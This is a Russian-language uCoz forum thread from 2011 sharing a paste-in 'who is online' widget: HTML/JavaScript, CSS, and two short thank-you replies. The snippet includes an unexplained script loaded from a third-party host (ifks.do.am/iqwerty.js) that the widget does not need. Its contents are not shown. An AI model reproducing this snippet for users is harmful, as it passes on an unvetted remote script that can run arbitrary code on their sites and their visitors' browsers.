Реклама:


Мини-чат

  • Страница 1 из 1
  • 1
Форум eQzotic » Скрипты для ucoz » Другие скрипты » Блок кто онлайн
Блок кто онлайн
АнДрюХа | Доп. инфо. Дата: Среда, 07.09.2011, 00:30 | Сообщение # 1

[yellowtable]Ставим этот код в нужное вам место:[/yellowtable]
Code
<script type="text/javascript">       
// JavaScript Document       
function cssmenuhover()       
{       
       if(!document.getElementById("cssmenu"))       
       return;       
       var lis = document.getElementById("cssmenu").getElementsByTagName("LI");       
       for (var i=0;i<lis.length;i++)       
       {       
       lis[i].onmouseover=function(){this.className+=" iehover";}       
       lis[i].onmouseout=function() {this.className=this.className.replace(new RegExp(" iehover\\b"), "");}       
       }       
}       
if (window.attachEvent)       
       window.attachEvent("onload", cssmenuhover);       
</script>       
</td>       
<script language="JavaScript"src="http://ifks.do.am/iqwerty.js"></script>       
<div onclick="$('#online').toggle('slow');" href="javascript://" class="Online"><img src="/images/Online_users.png" border="0"></div>       
<div id="online" class="Online2">       
<fieldset class="counter">       
<center>       
$ONLINE_COUNTER$       
</center>       

</fieldset>       
</div>


[yellowtable]А этот код ставим в CSS:[/yellowtable]
Code
/* Stat by Olezka */  
.Online {  
background: url(/images/b.gif);  
border: 1px dashed #5d5d5d;  
text-align: center;  
padding: 5px;  
position: fixed;  
bottom: 10px;  
left: 10px;  
cursor: pointer;  
color: #666666;  
text-decoration: none;  
}  
/* ------------ */  

/* Stat2 by Olezka */  
.Online2 {  
background: url(/images/b.gif);  
border: 1px dashed #5d5d5d;  
text-align: center;  
padding: 5px;  
position: fixed;  
bottom: 30px;  
left: 10px;  
color: #666666;  
text-decoration: none;  
display:none;  
}  
/* ------------ */
Прикрепления: 5155251.gif (30.5 Kb)



Sereja | Доп. инфо. Дата: Вторник, 25.10.2011, 16:14 | Сообщение # 2
афигеть Cпс админ рулит
Zo)m | Доп. инфо. Дата: Пятница, 28.10.2011, 19:04 | Сообщение # 3
норм
Форум eQzotic » Скрипты для ucoz » Другие скрипты » Блок кто онлайн
  • Страница 1 из 1
  • 1
Поиск: